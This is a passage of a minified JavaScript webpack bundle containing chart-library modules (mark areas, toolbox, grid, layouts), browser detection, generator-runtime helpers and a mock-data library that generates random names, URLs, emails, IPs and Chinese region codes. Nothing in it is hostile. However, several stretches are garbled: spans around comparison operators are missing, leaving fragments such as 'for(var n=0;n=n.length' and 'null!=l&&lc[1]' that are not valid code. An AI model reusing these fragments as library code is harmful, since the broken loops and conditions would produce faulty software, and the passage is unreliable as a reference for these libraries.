t=i.get(e),null==t&&(n?(t=this.categories.length,this.categories[t]=e,i.set(e,t)):t=NaN),t};var h=s;e.exports=h},"8e77":function(e,t,n){var i=n("6d8b"),r=n("41ef"),o=n("6179"),a=n("3842"),s=n("2306"),l=n("923d"),u=n("88f0"),c=function(e,t,n,r){var o=l.dataTransform(e,r[0]),a=l.dataTransform(e,r[1]),s=i.retrieve,u=o.coord,c=a.coord;u[0]=s(u[0],-1/0),u[1]=s(u[1],-1/0),c[0]=s(c[0],1/0),c[1]=s(c[1],1/0);var h=i.mergeAll([{},o,a]);return h.coord=[o.coord,a.coord],h.x0=o.x,h.y0=o.y,h.x1=a.x,h.y1=a.y,h};function h(e){return!isNaN(e)&&!isFinite(e)}function d(e,t,n,i){var r=1-e;return h(t[r])&&h(n[r])}function f(e,t){var n=t.coord[0],i=t.coord[1];return!("cartesian2d"!==e.type||!n||!i||!d(1,n,i,e)&&!d(0,n,i,e))||(l.dataFilter(e,{coord:n,x:t.x0,y:t.y0})||l.dataFilter(e,{coord:i,x:t.x1,y:t.y1}))}function p(e,t,n,i,r){var o,s=i.coordinateSystem,l=e.getItemModel(t),u=a.parsePercent(l.get(n[0]),r.getWidth()),c=a.parsePercent(l.get(n[1]),r.getHeight());if(isNaN(u)||isNaN(c)){if(i.getMarkerPosition)o=i.getMarkerPosition(e.getValues(n,t));else{var d=e.get(n[0],t),f=e.get(n[1],t),p=[d,f];s.clampData&&s.clampData(p,p),o=s.dataToPoint(p,!0)}if("cartesian2d"===s.type){var g=s.getAxis("x"),m=s.getAxis("y");d=e.get(n[0],t),f=e.get(n[1],t);h(d)?o[0]=g.toGlobalCoord(g.getExtent()["x0"===n[0]?0:1]):h(f)&&(o[1]=m.toGlobalCoord(m.getExtent()["y0"===n[1]?0:1]))}isNaN(u)||(o[0]=u),isNaN(c)||(o[1]=c)}else o=[u,c];return o}var g=[["x0","y0"],["x1","y0"],["x1","y1"],["x0","y1"]];function m(e,t,n){var r,a,s=["x0","y0","x1","y1"];e?(r=i.map(e&&e.dimensions,(function(e){var n=t.getData(),r=n.getDimensionInfo(n.mapDimension(e))||{};return i.defaults({name:e},r)})),a=new o(i.map(s,(function(e,t){return{name:e,type:r[t%2].type}})),n)):(r=[{name:"value",type:"float"}],a=new o(r,n));var l=i.map(n.get("data"),i.curry(c,t,e,n));e&&(l=i.filter(l,i.curry(f,e)));var u=e?function(e,t,n,i){return e.coord[Math.floor(i/2)][i%2]}:function(e){return e.value};return a.initData(l,null,u),a.hasItemOption=!0,a}u.extend({type:"markArea",updateTransform:function(e,t,n){t.eachSeries((function(e){var t=e.markAreaModel;if(t){var r=t.getData();r.each((function(t){var o=i.map(g,(function(i){return p(r,t,i,e,n)}));r.setItemLayout(t,o);var a=r.getItemGraphicEl(t);a.setShape("points",o)}))}}),this)},renderSeries:function(e,t,n,o){var a=e.coordinateSystem,l=e.id,u=e.getData(),c=this.markerGroupMap,d=c.get(l)||c.set(l,{group:new s.Group});this.group.add(d.group),d.__keep=!0;var f=m(a,e,t);t.setData(f),f.each((function(t){var n=i.map(g,(function(n){return p(f,t,n,e,o)})),r=!0;i.each(g,(function(e){if(r){var n=f.get(e[0],t),i=f.get(e[1],t);(h(n)||a.getAxis("x").containData(n))&&(h(i)||a.getAxis("y").containData(i))&&(r=!1)}})),f.setItemLayout(t,{points:n,allClipped:r}),f.setItemVisual(t,{color:u.getVisual("color")})})),f.diff(d.__data).add((function(e){var t=f.getItemLayout(e);if(!t.allClipped){var n=new s.Polygon({shape:{points:t.points}});f.setItemGraphicEl(e,n),d.group.add(n)}})).update((function(e,n){var i=d.__data.getItemGraphicEl(n),r=f.getItemLayout(e);r.allClipped?i&&d.group.remove(i):(i?s.updateProps(i,{shape:{points:r.points}},t,e):i=new s.Polygon({shape:{points:r.points}}),f.setItemGraphicEl(e,i),d.group.add(i))})).remove((function(e){var t=d.__data.getItemGraphicEl(e);d.group.remove(t)})).execute(),f.eachItemGraphicEl((function(e,n){var o=f.getItemModel(n),a=o.getModel("label"),l=o.getModel("emphasis.label"),u=f.getItemVisual(n,"color");e.useStyle(i.defaults(o.getModel("itemStyle").getItemStyle(),{fill:r.modifyAlpha(u,.4),stroke:u})),e.hoverStyle=o.getModel("emphasis.itemStyle").getItemStyle(),s.setLabelStyle(e.style,e.hoverStyle,a,l,{labelFetcher:t,labelDataIndex:n,defaultText:f.getName(n)||"",isRectText:!0,autoColor:u}),s.setHoverStyle(e,{}),e.dataModel=t})),d.__data=f,d.group.silent=t.get("silent")||e.get("silent")}})},"8eb7":function(e,t){var n,i,r,o,a,s,l,u,c,h,d,f,p,g,m,v=!1;function y(){if(!v){v=!0;var e=navigator.userAgent,t=/(?:MSIE.(\d+\.\d+))|(?:(?:Firefox|GranParadiso|Iceweasel).(\d+\.\d+))|(?:Opera(?:.+Version.|.)(\d+\.\d+))|(?:AppleWebKit.(\d+(?:\.\d+)?))|(?:Trident\/\d+\.\d+.*rv:(\d+\.\d+))/.exec(e),y=/(Mac OS X)|(Windows)|(Linux)/.exec(e);if(f=/\b(iPhone|iP[ao]d)/.exec(e),p=/\b(iP[ao]d)/.exec(e),h=/Android/i.exec(e),g=/FBAN\/\w+;/i.exec(e),m=/Mobile/i.exec(e),d=!!/Win64/.exec(e),t){n=t[1]?parseFloat(t[1]):t[5]?parseFloat(t[5]):NaN,n&&document&&document.documentMode&&(n=document.documentMode);var _=/(?:Trident\/(\d+.\d+))/.exec(e);s=_?parseFloat(_[1])+4:n,i=t[2]?parseFloat(t[2]):NaN,r=t[3]?parseFloat(t[3]):NaN,o=t[4]?parseFloat(t[4]):NaN,o?(t=/(?:Chrome\/(\d+\.\d+))/.exec(e),a=t&&t[1]?parseFloat(t[1]):NaN):a=NaN}else n=i=r=a=o=NaN;if(y){if(y[1]){var b=/(?:Mac OS X (\d+(?:[._]\d+)?))/.exec(e);l=!b||parseFloat(b[1].replace("_","."))}else l=!1;u=!!y[2],c=!!y[3]}else l=u=c=!1}}var _={ie:function(){return y()||n},ieCompatibilityMode:function(){return y()||s>n},ie64:function(){return _.ie()&&d},firefox:function(){return y()||i},opera:function(){return y()||r},webkit:function(){return y()||o},safari:function(){return _.webkit()},chrome:function(){return y()||a},windows:function(){return y()||u},osx:function(){return y()||l},linux:function(){return y()||c},iphone:function(){return y()||f},mobile:function(){return y()||f||p||h||m},nativeApp:function(){return y()||g},android:function(){return y()||h},ipad:function(){return y()||p}};e.exports=_},"8ec5":function(e,t,n){var i=n("3eba"),r=n("6d8b"),o=n("2145"),a=i.extendComponentModel({type:"toolbox",layoutMode:{type:"box",ignoreSize:!0},optionUpdated:function(){a.superApply(this,"optionUpdated",arguments),r.each(this.option.feature,(function(e,t){var n=o.get(t);n&&r.merge(e,n.defaultOption)}))},defaultOption:{show:!0,z:6,zlevel:0,orient:"horizontal",left:"right",top:"top",backgroundColor:"transparent",borderColor:"#ccc",borderRadius:0,borderWidth:0,padding:5,itemSize:15,itemGap:8,showTitle:!0,iconStyle:{borderColor:"#666",color:"none"},emphasis:{iconStyle:{borderColor:"#3E98C5"}},tooltip:{show:!1}}}),s=a;e.exports=s},"8ed2":function(e,t,n){n("48c7");var i=n("6cb7"),r=i.extend({type:"grid",dependencies:["xAxis","yAxis"],layoutMode:"box",coordinateSystem:null,defaultOption:{show:!1,zlevel:0,z:0,left:"10%",top:60,right:"10%",bottom:60,containLabel:!1,backgroundColor:"rgba(0,0,0,0)",borderWidth:1,borderColor:"#ccc"}});e.exports=r},"8ee0":function(e,t,n){n("3f8e");var i=n("697e7"),r=i.registerPainter,o=n("dc20");r("svg",o)},"903c":function(e,t){function n(e){var t=e.findComponents({mainType:"legend"});t&&t.length&&e.filterSeries((function(e){for(var n=0;n=n.length||e===n[e.depth]){var o=m(r,g,e,t,b,i);u(e,o,n,i)}}))}else l=h(g,e),e.setVisual("color",l)}}function c(e,t,n){var i=o.extend({},t),r=n.designatedVisualItemStyle;return o.each(["color","colorAlpha","colorSaturation"],(function(n){r[n]=t[n];var o=e.get(n);r[n]=null,null!=o&&(i[n]=o)})),i}function h(e){var t=f(e,"color");if(t){var n=f(e,"colorAlpha"),i=f(e,"colorSaturation");return i&&(t=r.modifyHSL(t,null,null,i)),n&&(t=r.modifyAlpha(t,n)),t}}function d(e,t){return null!=t?r.modifyHSL(t,null,null,e):null}function f(e,t){var n=e[t];if(null!=n&&"none"!==n)return n}function p(e,t,n,r,o,a){if(a&&a.length){var s=g(t,"color")||null!=o.color&&"none"!==o.color&&(g(t,"colorAlpha")||g(t,"colorSaturation"));if(s){var l=t.get("visualMin"),u=t.get("visualMax"),c=n.dataExtent.slice();null!=l&&lc[1]&&(c[1]=u);var h=t.get("colorMappingBy"),d={type:s.name,dataExtent:c,visual:s.range};"color"!==d.type||"index"!==h&&"id"!==h?d.mappingMethod="linear":(d.mappingMethod="category",d.loop=!0);var f=new i(d);return f.__drColorMappingBy=h,f}}}function g(e,t){var n=e.get(t);return a(n)&&n.length?{name:t,range:n}:null}function m(e,t,n,i,r,a){var s=o.extend({},t);if(r){var l=r.type,u="color"===l&&r.__drColorMappingBy,c="index"===u?i:"id"===u?a.mapIdToIndex(n.getId()):n.getValue(e.get("visualDimension"));s[l]=r.mapValueToVisual(c)}return s}e.exports=l},"90e3":function(e,t){var n=0,i=Math.random();e.exports=function(e){return"Symbol("+String(void 0===e?"":e)+")_"+(++n+i).toString(36)}},9112:function(e,t,n){var i=n("83ab"),r=n("9bf2"),o=n("5c6c");e.exports=i?function(e,t,n){return r.f(e,t,o(1,n))}:function(e,t,n){return e[t]=n,e}},9141:function(e,t,n){var i=n("ef08").document;e.exports=i&&i.documentElement},"923d":function(e,t,n){var i=n("6d8b"),r=n("3842"),o=n("ee1a"),a=o.isDimensionStacked,s=i.indexOf;function l(e){return!(isNaN(parseFloat(e.x))&&isNaN(parseFloat(e.y)))}function u(e){return!isNaN(parseFloat(e.x))&&!isNaN(parseFloat(e.y))}function c(e,t,n,i,o,s){var l=[],u=a(t,i),c=u?t.getCalculationInfo("stackResultDimension"):i,h=y(t,c,e),d=t.indicesOfNearest(c,h)[0];l[o]=t.get(n,d),l[s]=t.get(c,d);var f=t.get(i,d),p=r.getPrecision(t.get(i,d));return p=Math.min(p,20),p>=0&&(l[s]=+l[s].toFixed(p)),[l,f]}var h=i.curry,d={min:h(c,"min"),max:h(c,"max"),average:h(c,"average")};function f(e,t){var n=e.getData(),r=e.coordinateSystem;if(t&&!u(t)&&!i.isArray(t.coord)&&r){var o=r.dimensions,a=p(t,n,r,e);if(t=i.clone(t),t.type&&d[t.type]&&a.baseAxis&&a.valueAxis){var l=s(o,a.baseAxis.dim),c=s(o,a.valueAxis.dim),h=d[t.type](n,a.baseDataDim,a.valueDataDim,l,c);t.coord=h[0],t.value=h[1]}else{for(var f=[null!=t.xAxis?t.xAxis:t.radiusAxis,null!=t.yAxis?t.yAxis:t.angleAxis],g=0;g<2;g++)d[f[g]]&&(f[g]=y(n,n.mapDimension(o[g]),f[g]));t.coord=f}}return t}function p(e,t,n,i){var r={};return null!=e.valueIndex||null!=e.valueDim?(r.valueDataDim=null!=e.valueIndex?t.getDimension(e.valueIndex):e.valueDim,r.valueAxis=n.getAxis(g(i,r.valueDataDim)),r.baseAxis=n.getOtherAxis(r.valueAxis),r.baseDataDim=t.mapDimension(r.baseAxis.dim)):(r.baseAxis=i.getBaseAxis(),r.valueAxis=n.getOtherAxis(r.baseAxis),r.baseDataDim=t.mapDimension(r.baseAxis.dim),r.valueDataDim=t.mapDimension(r.valueAxis.dim)),r}function g(e,t){var n=e.getData(),i=n.dimensions;t=n.getDimension(t);for(var r=0;r0&&(!h.multiline||h.multiline&&"\n"!==e[h.lastIndex-1])&&(p="(?: "+p+")",m=" "+m,g++),n=new RegExp("^(?:"+p+")",f)),c&&(n=new RegExp("^"+p+"$(?!\\s)",f)),l&&(t=h.lastIndex),r=o.call(d?n:h,m),d?r?(r.input=r.input.slice(g),r[0]=r[0].slice(g),r.index=h.lastIndex,h.lastIndex+=r[0].length):h.lastIndex=0:l&&r&&(h.lastIndex=h.global?r.index+r[0].length:t),c&&r&&r.length>1&&a.call(r[0],n,(function(){for(s=1;so&&(c=s.interval=o);var h=s.intervalPrecision=a(c),d=s.niceTickExtent=[r(Math.ceil(e[0]/c)*c,h),r(Math.floor(e[1]/c)*c,h)];return l(d,e),s}function a(e){return i.getPrecisionSafe(e)+2}function s(e,t,n){e[t]=Math.max(Math.min(e[t],n[1]),n[0])}function l(e,t){!isFinite(e[0])&&(e[0]=t[0]),!isFinite(e[1])&&(e[1]=t[1]),s(e,0,t),s(e,1,t),e[0]>e[1]&&(e[0]=e[1])}t.intervalScaleNiceTicks=o,t.getIntervalPrecision=a,t.fixExtent=l},"94b1":function(e,t,n){var i=n("3eba"),r=n("6d8b"),o=n("9d57"),a=o.layout,s=o.largeLayout;n("5aa9"),n("17b8"),n("67cc"),n("01ed"),i.registerLayout(i.PRIORITY.VISUAL.LAYOUT,r.curry(a,"bar")),i.registerLayout(i.PRIORITY.VISUAL.PROGRESSIVE_LAYOUT,s),i.registerVisual({seriesType:"bar",reset:function(e){e.getData().setVisual("legendSymbol","roundRect")}})},"94ca":function(e,t,n){var i=n("d039"),r=/#|\.prototype\./,o=function(e,t){var n=s[a(e)];return n==u||n!=l&&("function"==typeof t?i(t):!!t)},a=o.normalize=function(e){return String(e).replace(r,".").toLowerCase()},s=o.data={},l=o.NATIVE="N",u=o.POLYFILL="P";e.exports=o},"94e4":function(e,t,n){var i=n("401b"),r=n("53f3"),o=r.getSymbolSize,a=r.getNodeGlobalScale,s=n("6d8b"),l=n("0c37"),u=l.getCurvenessForEdge,c=Math.PI,h=[];function d(e,t){var n=e.coordinateSystem;if(!n||"view"===n.type){var r=n.getBoundingRect(),o=e.getData(),a=o.graph,l=r.width/2+r.x,c=r.height/2+r.y,h=Math.min(r.width,r.height)/2,d=o.count();o.setLayout({cx:l,cy:c}),d&&(f[t](e,n,a,o,h,l,c,d),a.eachEdge((function(t,n){var r,o=s.retrieve3(t.getModel().get("lineStyle.curveness"),u(t,e,n),0),a=i.clone(t.node1.getLayout()),h=i.clone(t.node2.getLayout()),d=(a[0]+h[0])/2,f=(a[1]+h[1])/2;+o&&(o*=3,r=[l*o+d*(1-o),c*o+f*(1-o)]),t.setLayout([a,h,r])})))}}var f={value:function(e,t,n,i,r,o,a,s){var l=0,u=i.getSum("value"),c=2*Math.PI/(u||s);n.eachNode((function(e){var t=e.getValue("value"),n=c*(u?t:1)/2;l+=n,e.setLayout([r*Math.cos(l)+o,r*Math.sin(l)+a]),l+=n}))},symbolSize:function(e,t,n,i,r,s,l,u){var d=0;h.length=u;var f=a(e);n.eachNode((function(e){var t=o(e);isNaN(t)&&(t=2),t<0&&(t=0),t*=f;var n=Math.asin(t/2/r);isNaN(n)&&(n=c/2),h[e.dataIndex]=n,d+=2*n}));var p=(2*c-d)/u/2,g=0;n.eachNode((function(e){var t=p+h[e.dataIndex];g+=t,e.setLayout([r*Math.cos(g)+s,r*Math.sin(g)+l]),g+=t}))}};t.circularLayout=d},"95a8":function(e,t,n){var i=n("3eba");n("1953"),n("307d"),i.registerPreprocessor((function(e){e.markLine=e.markLine||{}}))},9619:function(e,t,n){var i=n("597f"),r=n("0e15");e.exports={throttle:i,debounce:r}},9680:function(e,t){function n(e,t,n,i,r,o,a){if(0===r)return!1;var s=r,l=0,u=e;if(a>t+s&&a>i+s||ae+s&&o>n+s||o=0;--o){var a=this.tryEntries[o],s=a.completion;if("root"===a.tryLoc)return i("end");if(a.tryLoc<=this.prev){var l=r.call(a,"catchLoc"),u=r.call(a,"finallyLoc");if(l&&u){if(this.prev=0;--n){var i=this.tryEntries[n];if(i.tryLoc<=this.prev&&r.call(i,"finallyLoc")&&this.prev=0;--t){var n=this.tryEntries[t];if(n.finallyLoc===e)return this.complete(n.completion,n.afterLoc),D(n),g}},catch:function(e){for(var t=this.tryEntries.length-1;t>=0;--t){var n=this.tryEntries[t];if(n.tryLoc===e){var i=n.completion;if("throw"===i.type){var r=i.arg;D(n)}return r}}throw new Error("illegal catch attempt")},delegateYield:function(e,t,i){return this.delegate={iterator:E(e),resultName:t,nextLoc:i},"next"===this.method&&(this.arg=n),g}}}function b(e,t,n,i){var r=t&&t.prototype instanceof w?t:w,o=Object.create(r.prototype),a=new L(i||[]);return o._invoke=C(e,n,a),o}function x(e,t,n){try{return{type:"normal",arg:e.call(t,n)}}catch(i){return{type:"throw",arg:i}}}function w(){}function k(){}function S(){}function M(e){["next","throw","return"].forEach((function(t){e[t]=function(e){return this._invoke(t,e)}}))}function A(e){function t(n,i,o,a){var s=x(e[n],e,i);if("throw"!==s.type){var l=s.arg,u=l.value;return u&&"object"===typeof u&&r.call(u,"__await")?Promise.resolve(u.__await).then((function(e){t("next",e,o,a)}),(function(e){t("throw",e,o,a)})):Promise.resolve(u).then((function(e){l.value=e,o(l)}),a)}a(s.arg)}var n;function i(e,i){function r(){return new Promise((function(n,r){t(e,i,n,r)}))}return n=n?n.then(r,r):r()}this._invoke=i}function C(e,t,n){var i=h;return function(r,o){if(i===f)throw new Error("Generator is already running");if(i===p){if("throw"===r)throw o;return O()}n.method=r,n.arg=o;while(1){var a=n.delegate;if(a){var s=T(a,n);if(s){if(s===g)continue;return s}}if("next"===n.method)n.sent=n._sent=n.arg;else if("throw"===n.method){if(i===h)throw i=p,n.arg;n.dispatchException(n.arg)}else"return"===n.method&&n.abrupt("return",n.arg);i=f;var l=x(e,t,n);if("normal"===l.type){if(i=n.done?p:d,l.arg===g)continue;return{value:l.arg,done:n.done}}"throw"===l.type&&(i=p,n.method="throw",n.arg=l.arg)}}}function T(e,t){var i=e.iterator[t.method];if(i===n){if(t.delegate=null,"throw"===t.method){if(e.iterator.return&&(t.method="return",t.arg=n,T(e,t),"throw"===t.method))return g;t.method="throw",t.arg=new TypeError("The iterator does not provide a 'throw' method")}return g}var r=x(i,e.iterator,t.arg);if("throw"===r.type)return t.method="throw",t.arg=r.arg,t.delegate=null,g;var o=r.arg;return o?o.done?(t[e.resultName]=o.value,t.next=e.nextLoc,"return"!==t.method&&(t.method="next",t.arg=n),t.delegate=null,g):o:(t.method="throw",t.arg=new TypeError("iterator result is not an object"),t.delegate=null,g)}function I(e){var t={tryLoc:e[0]};1 in e&&(t.catchLoc=e[1]),2 in e&&(t.finallyLoc=e[2],t.afterLoc=e[3]),this.tryEntries.push(t)}function D(e){var t=e.completion||{};t.type="normal",delete t.arg,e.completion=t}function L(e){this.tryEntries=[{tryLoc:"root"}],e.forEach(I,this),this.reset(!0)}function E(e){if(e){var t=e[a];if(t)return t.call(e);if("function"===typeof e.next)return e;if(!isNaN(e.length)){var i=-1,o=function t(){while(++i1)return this.getValueByKeyPath(key,options);if(templateContext&&"object"===typeof templateContext&&key in templateContext&&placeholder!==templateContext[key])return templateContext[key]=Handler.gen(templateContext[key],key,{currentContext:obj,templateCurrentContext:templateContext}),templateContext[key];if(!(key in Random)&&!(lkey in Random)&&!(okey in Random))return placeholder;for(var i=0;i1&&(r=t.context.path.slice(0),r.pop(),r=this.normalizePath(r.concat(i))),e=i[i.length-1];for(var o=t.context.root,a=t.context.templateRoot,s=1;s1/(e+t)*e?!n:n):Math.random()>=.5},bool:function(e,t,n){return this.boolean(e,t,n)},natural:function(e,t){return e="undefined"!==typeof e?parseInt(e,10):0,t="undefined"!==typeof t?parseInt(t,10):9007199254740992,Math.round(Math.random()*(t-e))+e},integer:function(e,t){return e="undefined"!==typeof e?parseInt(e,10):-9007199254740992,t="undefined"!==typeof t?parseInt(t,10):9007199254740992,Math.round(Math.random()*(t-e))+e},int:function(e,t){return this.integer(e,t)},float:function(e,t,n,i){n=void 0===n?0:n,n=Math.max(Math.min(n,17),0),i=void 0===i?17:i,i=Math.max(Math.min(i,17),0);for(var r=this.integer(e,t)+".",o=0,a=this.natural(n,i);o1&&i--,o=6*i<1?t+6*(n-t)*i:2*i<1?n:3*i<2?t+(n-t)*(2/3-i)*6:t,r[u]=255*o;return r},hsl2hsv:function(e){var t,n,i=e[0],r=e[1]/100,o=e[2]/100;return o*=2,r*=o<=1?o:2-o,n=(o+r)/2,t=2*r/(o+r),[i,100*t,100*n]},hsv2rgb:function(e){var t=e[0]/60,n=e[1]/100,i=e[2]/100,r=Math.floor(t)%6,o=t-Math.floor(t),a=255*i*(1-n),s=255*i*(1-n*o),l=255*i*(1-n*(1-o));switch(i*=255,r){case 0:return[i,l,a];case 1:return[s,i,a];case 2:return[a,i,l];case 3:return[a,s,i];case 4:return[l,a,i];case 5:return[i,a,s]}},hsv2hsl:function(e){var t,n,i=e[0],r=e[1]/100,o=e[2]/100;return n=(2-r)*o,t=r*o,t/=n<=1?n:2-n,n/=2,[i,100*t,100*n]},rgb2hex:function(e,t,n){return"#"+((256+e<<8|t)<<8|n).toString(16).slice(1)},hex2rgb:function(e){return e="0x"+e.slice(1).replace(e.length>4?e:/./g,"$&$&")|0,[e>>16,e>>8&255,255&e]}}},function(e,t){e.exports={navy:{value:"#000080",nicer:"#001F3F"},blue:{value:"#0000ff",nicer:"#0074D9"},aqua:{value:"#00ffff",nicer:"#7FDBFF"},teal:{value:"#008080",nicer:"#39CCCC"},olive:{value:"#008000",nicer:"#3D9970"},green:{value:"#008000",nicer:"#2ECC40"},lime:{value:"#00ff00",nicer:"#01FF70"},yellow:{value:"#ffff00",nicer:"#FFDC00"},orange:{value:"#ffa500",nicer:"#FF851B"},red:{value:"#ff0000",nicer:"#FF4136"},maroon:{value:"#800000",nicer:"#85144B"},fuchsia:{value:"#ff00ff",nicer:"#F012BE"},purple:{value:"#800080",nicer:"#B10DC9"},silver:{value:"#c0c0c0",nicer:"#DDDDDD"},gray:{value:"#808080",nicer:"#AAAAAA"},black:{value:"#000000",nicer:"#111111"},white:{value:"#FFFFFF",nicer:"#FFFFFF"}}},function(e,t,n){var i=n(6),r=n(14);function o(e,t,n,r){return void 0===n?i.natural(e,t):void 0===r?n:i.natural(parseInt(n,10),parseInt(r,10))}e.exports={paragraph:function(e,t){for(var n=o(3,7,e,t),i=[],r=0;r1&&(t=[].slice.call(arguments,0));var n=e.options,i=n.context.templatePath.join("."),r=e.cache[i]=e.cache[i]||{index:0,array:t};return r.array[r.index++%r.array.length]}}},function(e,t){e.exports={first:function(){var e=["James","John","Robert","Michael","William","David","Richard","Charles","Joseph","Thomas","Christopher","Daniel","Paul","Mark","Donald","George","Kenneth","Steven","Edward","Brian","Ronald","Anthony","Kevin","Jason","Matthew","Gary","Timothy","Jose","Larry","Jeffrey","Frank","Scott","Eric"].concat(["Mary","Patricia","Linda","Barbara","Elizabeth","Jennifer","Maria","Susan","Margaret","Dorothy","Lisa","Nancy","Karen","Betty","Helen","Sandra","Donna","Carol","Ruth","Sharon","Michelle","Laura","Sarah","Kimberly","Deborah","Jessica","Shirley","Cynthia","Angela","Melissa","Brenda","Amy","Anna"]);return this.pick(e)},last:function(){var e=["Smith","Johnson","Williams","Brown","Jones","Miller","Davis","Garcia","Rodriguez","Wilson","Martinez","Anderson","Taylor","Thomas","Hernandez","Moore","Martin","Jackson","Thompson","White","Lopez","Lee","Gonzalez","Harris","Clark","Lewis","Robinson","Walker","Perez","Hall","Young","Allen"];return this.pick(e)},name:function(e){return this.first()+" "+(e?this.first()+" ":"")+this.last()},cfirst:function(){var e="王 李 张 刘 陈 杨 赵 黄 周 吴 徐 孙 胡 朱 高 林 何 郭 马 罗 梁 宋 郑 谢 韩 唐 冯 于 董 萧 程 曹 袁 邓 许 傅 沈 曾 彭 吕 苏 卢 蒋 蔡 贾 丁 魏 薛 叶 阎 余 潘 杜 戴 夏 锺 汪 田 任 姜 范 方 石 姚 谭 廖 邹 熊 金 陆 郝 孔 白 崔 康 毛 邱 秦 江 史 顾 侯 邵 孟 龙 万 段 雷 钱 汤 尹 黎 易 常 武 乔 贺 赖 龚 文".split(" ");return this.pick(e)},clast:function(){var e="伟 芳 娜 秀英 敏 静 丽 强 磊 军 洋 勇 艳 杰 娟 涛 明 超 秀兰 霞 平 刚 桂英".split(" ");return this.pick(e)},cname:function(){return this.cfirst()+this.clast()}}},function(e,t){e.exports={url:function(e,t){return(e||this.protocol())+"://"+(t||this.domain())+"/"+this.word()},protocol:function(){return this.pick("http ftp gopher mailto mid cid news nntp prospero telnet rlogin tn3270 wais".split(" "))},domain:function(e){return this.word()+"."+(e||this.tld())},tld:function(){return this.pick("com net org edu gov int mil cn com.cn net.cn gov.cn org.cn 中国 中国互联.公司 中国互联.网络 tel biz cc tv info name hk mobi asia cd travel pro museum coop aero ad ae af ag ai al am an ao aq ar as at au aw az ba bb bd be bf bg bh bi bj bm bn bo br bs bt bv bw by bz ca cc cf cg ch ci ck cl cm cn co cq cr cu cv cx cy cz de dj dk dm do dz ec ee eg eh es et ev fi fj fk fm fo fr ga gb gd ge gf gh gi gl gm gn gp gr gt gu gw gy hk hm hn hr ht hu id ie il in io iq ir is it jm jo jp ke kg kh ki km kn kp kr kw ky kz la lb lc li lk lr ls lt lu lv ly ma mc md mg mh ml mm mn mo mp mq mr ms mt mv mw mx my mz na nc ne nf ng ni nl no np nr nt nu nz om qa pa pe pf pg ph pk pl pm pn pr pt pw py re ro ru rw sa sb sc sd se sg sh si sj sk sl sm sn so sr st su sy sz tc td tf tg th tj tk tm tn to tp tr tt tv tw tz ua ug uk us uy va vc ve vg vn vu wf ws ye yu za zm zr zw".split(" "))},email:function(e){return this.character("lower")+"."+this.word()+"@"+(e||this.word()+"."+this.tld())},ip:function(){return this.natural(0,255)+"."+this.natural(0,255)+"."+this.natural(0,255)+"."+this.natural(0,255)}}},function(e,t,n){var i=n(18),r=["东北","华北","华东","华中","华南","西南","西北"];e.exports={region:function(){return this.pick(r)},province:function(){return this.pick(i).name},city:function(e){var t=this.pick(i),n=this.pick(t.children);return e?[t.name,n.name].join(" "):n.name},county:function(e){var t=this.pick(i),n=this.pick(t.children),r=this.pick(n.children)||{name:"-"};return e?[t.name,n.name,r.name].join(" "):r.name},zip:function(e){for(var t="",n=0;n<(e||6);n++)t+=this.natural(0,9);return t}}},function(e,t){var n={11e4:"北京",110100:"北京市",110101:"东城区",110102:"西城区",110105:"朝阳区",110106:"丰台区",110107:"石景山区",110108:"海淀区",110109:"门头沟区",110111:"房山区",110112:"通州区",110113:"顺义区",110114:"昌平区",110115:"大兴区",110116:"怀柔区",110117:"平谷区",110228:"密云县",110229:"延庆县",110230:"其它区",12e4:"天津",120100:"天津市",120101:"和平区",120102:"河东区",120103:"河西区",120104:"南开区",120105:"河北区",120106:"红桥区",120110:"东丽区",120111:"西青区",120112:"津南区",120113:"北辰区",120114:"武清区",120115:"宝坻区",120116:"滨海新区",120221:"宁河县",120223:"静海县",120225:"蓟县",120226:"其它区",13e4:"河北省",130100:"石家庄市",130102:"长安区",130103:"桥东区",130104:"桥西区",130105:"新华区",130107:"井陉矿区",130108:"裕华区",130121:"井陉县",130123:"正定县",130124:"栾城县",130125:"行唐县",130126:"灵寿县",130127:"高邑县",130128:"深泽县",130129:"赞皇县",130130:"无极县",130131:"平山县",130132:"元氏县",130133:"赵县",130181:"辛集市",130182:"藁城市",130183:"晋州市",130184:"新乐市",130185:"鹿泉市",130186:"其它区",130200:"唐山市",130202:"路南区",130203:"路北区",130204:"古冶区",130205:"开平区",130207:"丰南区",130208:"丰润区",130223:"滦县",130224:"滦南县",130225:"乐亭县",130227:"迁西县",130229:"玉田县",130230:"曹妃甸区",130281:"遵化市",130283:"迁安市",130284:"其它区",130300:"秦皇岛市",130302:"海港区",130303:"山海关区",130304:"北戴河区",130321:"青龙满族自治县",130322:"昌黎县",130323:"抚宁县",130324:"卢龙县",130398:"其它区",130400:"邯郸市",130402:"邯山区",130403:"丛台区",130404:"复兴区",130406:"峰峰矿区",130421:"邯郸县",130423:"临漳县",130424:"成安县",130425:"大名县",130426:"涉县",130427:"磁县",130428:"肥乡县",130429:"永年县",130430:"邱县",130431:"鸡泽县",130432:"广平县",130433:"馆陶县",130434:"魏县",130435:"曲周县",130481:"武安市",130482:"其它区",130500:"邢台市",130502:"桥东区",130503:"桥西区",130521:"邢台县",130522:"临城县",130523:"内丘县",130524:"柏乡县",130525:"隆尧县",130526:"任县",130527:"南和县",130528:"宁晋县",130529:"巨鹿县",130530:"新河县",130531:"广宗县",130532:"平乡县",130533:"威县",130534:"清河县",130535:"临西县",130581:"南宫市",130582:"沙河市",130583:"其它区",130600:"保定市",130602:"新市区",130603:"北市区",130604:"南市区",130621:"满城县",130622:"清苑县",130623:"涞水县",130624:"阜平县",130625:"徐水县",130626:"定兴县",130627:"唐县",130628:"高阳县",130629:"容城县",130630:"涞源县",130631:"望都县",130632:"安新县",130633:"易县",130634:"曲阳县",130635:"蠡县",130636:"顺平县",130637:"博野县",130638:"雄县",130681:"涿州市",130682:"定州市",130683:"安国市",130684:"高碑店市",130699:"其它区",130700:"张家口市",130702:"桥东区",130703:"桥西区",130705:"宣化区",130706:"下花园区",130721:"宣化县",130722:"张北县",130723:"康保县",130724:"沽源县",130725:"尚义县",130726:"蔚县",130727:"阳原县",130728:"怀安县",130729:"万全县",130730:"怀来县",130731:"涿鹿县",130732:"赤城县",130733:"崇礼县",130734:"其它区",130800:"承德市",130802:"双桥区",130803:"双滦区",130804:"鹰手营子矿区",130821:"承德县",130822:"兴隆县",130823:"平泉县",130824:"滦平县",130825:"隆化县",130826:"丰宁满族自治县",130827:"宽城满族自治县",130828:"围场满族蒙古族自治县",130829:"其它区",130900:"沧州市",130902:"新华区",130903:"运河区",130921:"沧县",130922:"青县",130923:"东光县",130924:"海兴县",130925:"盐山县",130926:"肃宁县",130927:"南皮县",130928:"吴桥县",130929:"献县",130930:"